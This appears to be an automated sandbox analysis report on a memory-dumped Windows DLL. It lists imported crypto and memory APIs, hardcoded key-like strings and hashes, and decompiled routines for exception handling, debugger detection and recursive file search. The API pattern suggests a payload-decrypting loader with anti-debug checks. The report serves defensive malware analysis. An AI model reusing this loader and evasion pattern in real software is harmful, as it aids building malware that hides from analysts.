0x6ea51f62
0x6ea51f6d
0x6ea51f78
0x6ea51f83
0x6ea51f9d
0x6ea51f9f
0x6ea51fa1
0x6ea51fad
0x6ea51fb4
0x6ea51fb5
0x6ea51fa1
0x6ea51fc6
0x6ea51fcb
0x6ea51fcd
0x6ea51fd7
0x6ea51fda
0x6ea51fe8
0x6ea51fea
0x6ea51ff0
0x6ea51ff0
0x6ea51ff3
0x6ea51ff4
0x6ea51ff0
0x6ea51ff9
0x6ea51ffc
0x6ea5200c
0x6ea52011
0x6ea52011
0x6ea52014
0x6ea52016
0x6ea52024
0x6ea52026
0x6ea52026
0x6ea52029
0x6ea5202a
0x6ea52026
0x6ea5202f
0x6ea52032
0x6ea52042
0x6ea52047
0x6ea52047
0x6ea5204a
0x6ea52052
0x6ea5205d
0x6ea52068
0x6ea52073
0x6ea5208d
0x6ea5208f
0x6ea52091
0x6ea5209d
0x6ea520a4
0x6ea520a5
0x6ea52091
0x6ea520aa
0x6ea520b2
0x6ea520bd
0x6ea520c8
0x6ea520d3
0x6ea520ed
0x6ea520ef
0x6ea520f1
0x6ea520fd
0x6ea52104
0x6ea52105
0x6ea520f1
0x6ea52116
0x6ea5211b
0x6ea5211d
0x6ea52127
0x6ea5212a
0x6ea52138
0x6ea5213a
0x6ea52140
0x6ea52140
0x6ea52143
0x6ea52144
0x6ea52140
0x6ea52149
0x6ea5214c
0x6ea5215c
0x6ea52161
0x6ea52161
0x6ea52164
0x6ea52166
0x6ea52174
0x6ea52176
0x6ea52176
0x6ea52179
0x6ea5217a
0x6ea52176
0x6ea5217f
0x6ea52182
0x6ea52192
0x6ea52197
0x6ea52197
0x6ea5219a
0x6ea521a2
0x6ea521ad
0x6ea521b8
0x6ea521c3
0x6ea521dd
0x6ea521df
0x6ea521e1
0x6ea521ed
0x6ea521f4
0x6ea521f5
0x6ea521e1
0x6ea521fa
0x6ea52202
0x6ea5220d
0x6ea52218
0x6ea52223
0x6ea5222e
0x6ea52248
0x6ea5224a
0x6ea52250
0x6ea5225c
0x6ea52263
0x6ea52264
0x6ea52250
0x6ea52275
0x6ea5227a
0x6ea5227c
0x6ea52286
0x6ea52289
0x6ea52297
0x6ea522a0
0x6ea522a0
0x6ea522a3
0x6ea522a4
0x6ea522a0
0x6ea522a9
0x6ea522ac
0x6ea522bc
0x6ea522c1
0x6ea522c1
0x6ea522c4
0x6ea522c6
0x6ea522d4
0x6ea522d6
0x6ea522d6
0x6ea522d9
0x6ea522da
0x6ea522d6
0x6ea522df
0x6ea522e2
0x00000000
0x6ea522f7
0x6ea522fd

Strings

?,c, xrefs: 6EA52223
VirtualProtect, xrefs: 6EA511F0, 6EA51237
`gtVirtualQuery, xrefs: 6EA511FC
CryptDestroyKey, xrefs: 6EA52111, 6EA52157
HeapFree, xrefs: 6EA5193D, 6EA51974
Advapi32.dll, xrefs: 6EA5203D
GetProcessHeap, xrefs: 6EA515C0, 6EA51607
Advapi32.dll, xrefs: 6EA522ED
AdvApi32.dll, xrefs: 6EA51EED
UtHeapReAlloc, xrefs: 6EA51949
VirtualAlloc, xrefs: 6EA510AA, 6EA510E4
HeapSize, xrefs: 6EA5181D, 6EA51854
VirtualFree, xrefs: 6EA5147A, 6EA514B4
KERNEL32.dll, xrefs: 6EA5176A
";g, xrefs: 6EA52202
CryptDecrypt, xrefs: 6EA51FC1, 6EA52007
CryptReleaseContext, xrefs: 6EA52270, 6EA522B7
KPt, xrefs: 6EA519E0
CryptImportKey, xrefs: 6EA51D11, 6EA51D57
OtHeapAlloc, xrefs: 6EA515CC
KERNEL32.dll, xrefs: 6EA513BD
Advapi32.dll, xrefs: 6EA51D8D
CryptAcquireContextA, xrefs: 6EA51BC0, 6EA51C07
KERNEL32.dll, xrefs: 6EA51ACA
KERNEL32.dll, xrefs: 6EA51114
KERNEL32.dll, xrefs: 6EA5163D
KERNEL32.dll, xrefs: 6EA5188A
Advapi32.dll, xrefs: 6EA5218D
Advapi32.dll, xrefs: 6EA51C3D
KERNEL32.dll, xrefs: 6EA519AA
CryptSetKeyParam, xrefs: 6EA51E70, 6EA51EB7
KERNEL32.dll, xrefs: 6EA514EA
+11r, xrefs: 6EA52218
KERNEL32.dll, xrefs: 6EA5126D

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ";g$?,c$ OtHeapAlloc$ UtHeapReAlloc$+11r$AdvApi32.dll$Advapi32.dll$Advapi32.dll$Advapi32.dll$Advapi32.dll$Advapi32.dll$CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptImportKey$CryptReleaseContext$CryptSetKeyParam$GetProcessHeap$HeapFree$HeapSize$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KERNEL32.dll$KPt$VirtualAlloc$VirtualFree$VirtualProtect$`gtVirtualQuery
API String ID: 0-1127669070
Opcode ID: 9d141ec795013e08234eb0469c666f7b066a0426203a0f62340dee20113a67d1
Instruction ID: a4b4336dc13662d03246fb910787eb2ef0760a5f00d3da40040c7939b90a983c
Opcode Fuzzy Hash: 9d141ec795013e08234eb0469c666f7b066a0426203a0f62340dee20113a67d1
Instruction Fuzzy Hash: BEA2C0B041C3809EE375DF54E495BFBBBE4BB92308F19486DD1DA4B342E73184988B5A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA52300, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 186encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,00000000,00000002,00000000), ref: 6EA523C7
CryptImportKey.ADVAPI32(00000000,00000208,0000002C,00000000,00000001,00000000), ref: 6EA523E2

Strings

cfhelxslqkzlhbfx, xrefs: 6EA52377
, xrefs: 6EA5239B
dlynyldiboesrvwplmwozrwmuhoxjmyn, xrefs: 6EA52318

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$AcquireContextImport
String ID: $cfhelxslqkzlhbfx$dlynyldiboesrvwplmwozrwmuhoxjmyn
API String ID: 193843291-431830275
Opcode ID: 572058e0342ae6734390dda27a3fb22f0c0fa324548b3a6e68725a711670933c
Instruction ID: 03fd06bfb19c13d5e82999d2beea7861e9972bfd9b48b4ccaf246c6030712239
Opcode Fuzzy Hash: 572058e0342ae6734390dda27a3fb22f0c0fa324548b3a6e68725a711670933c
Instruction Fuzzy Hash: 2F61A131E042499FEF24CFA8C8917EDBBB4BF49300F148169E655E7381DB7159858F64

Uniqueness

Uniqueness Score: -1.00%

Function 6EA56B21, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6EA56B21(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0x6ea93004; // 0x90a7628e
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E6EA53BB6(_t41);
					_pop(_t62);
				}
				E6EA54050(_t67,  &_v804, 0, 0x50);
				E6EA54050(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E6EA53BB6(_t57);
				}
				return E6EA53252(_v8 ^ _t70);
			}

0x6ea56b21
0x6ea56b21
0x6ea56b21
0x6ea56b21
0x6ea56b2c
0x6ea56b31
0x6ea56b33
0x6ea56b3b
0x6ea56b3d
0x6ea56b40
0x6ea56b45
0x6ea56b45
0x6ea56b51
0x6ea56b64
0x6ea56b72
0x6ea56b78
0x6ea56b7e
0x6ea56b84
0x6ea56b8a
0x6ea56b90
0x6ea56b96
0x6ea56b9c
0x6ea56ba2
0x6ea56ba8
0x6ea56baf
0x6ea56bb6
0x6ea56bbd
0x6ea56bc4
0x6ea56bcb
0x6ea56bd2
0x6ea56bd3
0x6ea56bdc
0x6ea56be2
0x6ea56be5
0x6ea56beb
0x6ea56bf8
0x6ea56c01
0x6ea56c0a
0x6ea56c13
0x6ea56c21
0x6ea56c23
0x6ea56c38
0x6ea56c44
0x6ea56c47
0x6ea56c4c
0x6ea56c5b

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6EA56C19
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6EA56C23
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6EA56C30

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 285b7cd8ad522616231c5cd0cfec02f56cedd6e9e1f61fcb3418be083132947e
Instruction ID: aa65ed4f7ee46fe4ac2e929022af6a50c51f6e8ac66dfd124c23e0845cacda91
Opcode Fuzzy Hash: 285b7cd8ad522616231c5cd0cfec02f56cedd6e9e1f61fcb3418be083132947e
Instruction Fuzzy Hash: CE31C2749113189BCB21DF64D988BCDBBB8BF48311F5045EAE81CA6350EB309F958F48

Uniqueness

Uniqueness Score: -1.00%

Function 6EA55900, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EA55900(int _a4) {
				void* _t14;
				void* _t16;

				if(E6EA56AEE(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E6EA55986(_t14, _t16, _a4);
				ExitProcess(_a4);
			}

0x6ea5590d
0x6ea55929
0x6ea55929
0x6ea55932
0x6ea5593b

APIs

GetCurrentProcess.KERNEL32(?,?,6EA558FF,?,00000001,?,?), ref: 6EA55922
TerminateProcess.KERNEL32(00000000,?,6EA558FF,?,00000001,?,?), ref: 6EA55929
ExitProcess.KERNEL32 ref: 6EA5593B

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 486afefffa599dffdd84be1169b71baf8766bfdb46a012906720ce7c7202ab2d
Instruction ID: bb2825b006361334df04575d942c8b9159be822294ab9243d98de4ff156fe7d5
Opcode Fuzzy Hash: 486afefffa599dffdd84be1169b71baf8766bfdb46a012906720ce7c7202ab2d
Instruction Fuzzy Hash: 55E04631050608EFCF116FA0CD08A493B29FB45262B018814F9059E220CB39DCA2DA54

Uniqueness

Uniqueness Score: -1.00%

Function 6EA57045, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E6EA57045(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				intOrPtr _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				intOrPtr _t40;
				void* _t45;
				signed int _t47;
				intOrPtr _t49;
				signed char _t50;
				intOrPtr* _t58;
				union _FINDEX_INFO_LEVELS _t60;
				int _t65;
				intOrPtr _t75;
				signed char _t78;
				void* _t80;
				void* _t83;
				intOrPtr _t84;
				union _FINDEX_INFO_LEVELS _t85;
				intOrPtr _t88;
				intOrPtr* _t91;
				intOrPtr _t93;
				void* _t95;
				intOrPtr* _t96;
				signed int _t100;
				void* _t110;
				intOrPtr _t111;
				signed int _t114;
				CHAR* _t116;
				intOrPtr _t121;
				void* _t122;
				signed char _t124;
				void* _t128;
				signed int _t129;
				void* _t130;
				void* _t131;

				_push(__ecx);
				_t91 = _a4;
				_t2 = _t91 + 1; // 0x1
				_t110 = _t2;
				do {
					_t40 =  *_t91;
					_t91 = _t91 + 1;
				} while (_t40 != 0);
				_push(__edi);
				_t114 = _a12;
				_t93 = _t91 - _t110 + 1;
				_v8 = _t93;
				if(_t93 <=  !_t114) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t114 + 1; // 0x1
					_t83 = _t5 + _t93;
					_t121 = E6EA56DB6(_t93, _t83, 1);
					_pop(_t95);
					if(_t114 == 0) {
						L6:
						_push(_v8);
						_t83 = _t83 - _t114;
						_t45 = E6EA59795(_t95, _t121 + _t114, _t83, _a4);
						_t129 = _t128 + 0x10;
						if(_t45 != 0) {
							goto L12;
						} else {
							_t88 = _a16;
							_t75 = E6EA57278(_t88);
							_v8 = _t75;
							if(_t75 == 0) {
								 *((intOrPtr*)( *((intOrPtr*)(_t88 + 4)))) = _t121;
								_t124 = 0;
								 *((intOrPtr*)(_t88 + 4)) =  *((intOrPtr*)(_t88 + 4)) + 4;
							} else {
								E6EA56E13(_t121);
								_t124 = _v8;
							}
							E6EA56E13(0);
							_t78 = _t124;
							goto L11;
						}
					} else {
						_push(_t114);
						_t80 = E6EA59795(_t95, _t121, _t83, _a8);
						_t129 = _t128 + 0x10;
						if(_t80 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E6EA56CF6();
							asm("int3");
							_t127 = _t129;
							_t130 = _t129 - 0x150;
							_t47 =  *0x6ea93004; // 0x90a7628e
							_v48 = _t47 ^ _t129;
							_t96 = _v32;
							_push(_t83);
							_t84 = _v332.cAlternateFileName;
							_push(0);
							_t116 = _v36;
							_v372 = _t84;
							while(_t96 != _t116) {
								_t49 =  *_t96;
								if(_t49 != 0x2f && _t49 != 0x5c && _t49 != 0x3a) {
									_t96 = E6EA597E0(_t116, _t96);
									continue;
								}
								break;
							}
							_t111 =  *_t96;
							if(_t111 != 0x3a || _t96 ==  &(_t116[1])) {
								_t85 = 0;
								if(_t111 == 0x2f || _t111 == 0x5c) {
									L25:
									_t50 = 1;
								} else {
									_t50 = 0;
									if(_t111 == 0x3a) {
										goto L25;
									}
								}
								_t98 = _t96 - _t116 + 1;
								_push(_t121);
								asm("sbb eax, eax");
								_v340 =  ~(_t50 & 0x000000ff) & _t96 - _t116 + 0x00000001;
								E6EA54050(_t116,  &_v332, _t85, 0x140);
								_t131 = _t130 + 0xc;
								_t122 = FindFirstFileExA(_t116, _t85,  &_v332, _t85, _t85, _t85);
								_t58 = _v336;
								if(_t122 != 0xffffffff) {
									_t100 =  *((intOrPtr*)(_t58 + 4)) -  *_t58;
									_t101 = _t100 >> 2;
									_v344 = _t100 >> 2;
									do {
										if(_v332.cFileName != 0x2e) {
											L38:
											_push(_t58);
											_t60 = E6EA57045(_t85, _t101, _t116, _t122,  &(_v332.cFileName), _t116, _v340);
											_t131 = _t131 + 0x10;
											if(_t60 != 0) {
												goto L28;
											} else {
												goto L39;
											}
										} else {
											_t101 = _v287;
											if(_t101 == 0 || _t101 == 0x2e && _v286 == _t85) {
												goto L39;
											} else {
												goto L38;
											}
										}
										goto L42;
										L39:
										_t65 = FindNextFileA(_t122,  &_v332);
										_t58 = _v336;
									} while (_t65 != 0);
									_t112 =  *_t58;
									_t104 = _v344;
									_t68 =  *((intOrPtr*)(_t58 + 4)) -  *_t58 >> 2;
									if(_v344 !=  *((intOrPtr*)(_t58 + 4)) -  *_t58 >> 2) {
										E6EA592A0(_t85, _t116, _t122, _t112 + _t104 * 4, _t68 - _t104, 4, E6EA56E4D);
									}
								} else {
									_push(_t58);
									_t60 = E6EA57045(_t85, _t98, _t116, _t122, _t116, _t85, _t85);
									L28:
									_t85 = _t60;
								}
								if(_t122 != 0xffffffff) {
									FindClose(_t122);
								}
							} else {
								_push(_t84);
								E6EA57045(0, _t96, _t116, _t121, _t116, 0, 0);
							}
							return E6EA53252(_v12 ^ _t127);
						} else {
							goto L6;
						}
					}
				} else {
					_t78 = 0xc;
					L11:
					return _t78;
				}
				L42:
			}

0x6ea5704a
0x6ea5704b
0x6ea5704e
0x6ea5704e
0x6ea57051
0x6ea57051
0x6ea57053
0x6ea57054
0x6ea57058
0x6ea57059
0x6ea57060
0x6ea57063
0x6ea57068
0x6ea5706f
0x6ea57070
0x6ea57071
0x6ea57074
0x6ea5707e
0x6ea57081
0x6ea57084
0x6ea57098
0x6ea57098
0x6ea5709b
0x6ea570a5
0x6ea570aa
0x6ea570af
0x00000000
0x6ea570b1
0x6ea570b1
0x6ea570b6
0x6ea570bd
0x6ea570c2
0x6ea570d3
0x6ea570d5
0x6ea570d7
0x6ea570c4
0x6ea570c5
0x6ea570ca
0x6ea570cd
0x6ea570dc
0x6ea570e2
0x00000000
0x6ea570e5
0x6ea57086
0x6ea57086
0x6ea5708c
0x6ea57091
0x6ea57096
0x6ea570eb
0x6ea570ed
0x6ea570ee
0x6ea570ef
0x6ea570f0
0x6ea570f1
0x6ea570f2
0x6ea570f7
0x6ea570fb
0x6ea570fd
0x6ea57103
0x6ea5710a
0x6ea5710d
0x6ea57110
0x6ea57111
0x6ea57114
0x6ea57115
0x6ea57118
0x6ea57139
0x6ea57120
0x6ea57124
0x6ea57137
0x00000000
0x6ea57137
0x00000000
0x6ea57124
0x6ea5713d
0x6ea57142
0x6ea5715b
0x6ea57160
0x6ea5716e
0x6ea5716e
0x6ea57167
0x6ea57167
0x6ea5716c
0x00000000
0x00000000
0x6ea5716c
0x6ea57175
0x6ea57178
0x6ea57179
0x6ea57182
0x6ea57190
0x6ea57195
0x6ea571aa
0x6ea571ac
0x6ea571b5
0x6ea571e7
0x6ea571e9
0x6ea571ec
0x6ea571f2
0x6ea571f9
0x6ea57212
0x6ea57212
0x6ea57221
0x6ea57226
0x6ea5722b
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea571fb
0x6ea571fb
0x6ea57203
0x00000000
0x00000000
0x00000000
0x00000000
0x6ea57203
0x00000000
0x6ea5722d
0x6ea57235
0x6ea5723d
0x6ea5723d
0x6ea57245
0x6ea5724a
0x6ea57252
0x6ea57257
0x6ea5726b
0x6ea57270
0x6ea571b7
0x6ea571b7
0x6ea571bb
0x6ea571c3
0x6ea571c3
0x6ea571c3
0x6ea571c8
0x6ea571cb
0x6ea571cb
0x6ea5714b
0x6ea5714b
0x6ea57151
0x6ea57156
0x6ea571e3
0x00000000
0x00000000
0x00000000
0x6ea57096
0x6ea5706a
0x6ea5706c
0x6ea570e6
0x6ea570ea
0x6ea570ea
0x00000000

Strings

., xrefs: 6EA571F2

Memory Dump Source

Source File: 00000002.00000002.836769996.000000006EA51000.00000020.00020000.sdmp, Offset: 6EA50000, based on PE: true

Associated: 00000002.00000002.836765210.000000006EA50000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836778153.000000006EA5E000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.836803874.000000006EA93000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.836809860.000000006EA97000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 5ae35d6892b592ea6c00955ad63f9387b2fd43e4afaf23a18c1046b75ed894ee
Instruction ID: 9d63bb72b144e76de9e38391a751a6ce3c28f690d99e91b192987c485c369b93
Opcode Fuzzy Hash: 5ae35d6892b592ea6c00955ad63f9387b2fd43e4afaf23a18c1046b75ed894ee
Instruction Fuzzy Hash: A13126B1900209AFDB14CEB8CC94EFB7BBDEB85308F148198F959A7391E6309DD58B54

Uniqueness

Uniqueness Score: -1.00%

Function 6EA5C678, Relevance: 1.8, APIs: 1, Instructions: 269
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6EA5C678(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E6EA5C09E(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E6EA5C004(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x6ea5c686
0x6ea5c68d
0x6ea5c692
0x6ea5c698
0x6ea5c69b
0x6ea5c6a1
0x6ea5c6a6
0x6ea5c6ab
0x6ea5c6ab
0x6ea5c6b1
0x6ea5c6b6
0x6ea5c6bb
0x6ea5c6bb
0x6ea5c6c2
0x6ea5c6c7
0x6ea5c6cc
0x6ea5c6cc
0x6ea5c6d3
0x6ea5c6d8
0x6ea5c6dd
0x6ea5c6dd
0x6ea5c6e4
0x6ea5c6e9
0x6ea5c6ee
0x6ea5c6ee
0x6ea5c6f6
0x6ea5c706
0x6ea5c718
0x6ea5c72a
0x6ea5c73d
0x6ea5c74f
0x6ea5c757
0x6ea5c75c
0x6ea5c761
0x6ea5c761
0x6ea5c768
0x6ea5c76d
0x6ea5c76d
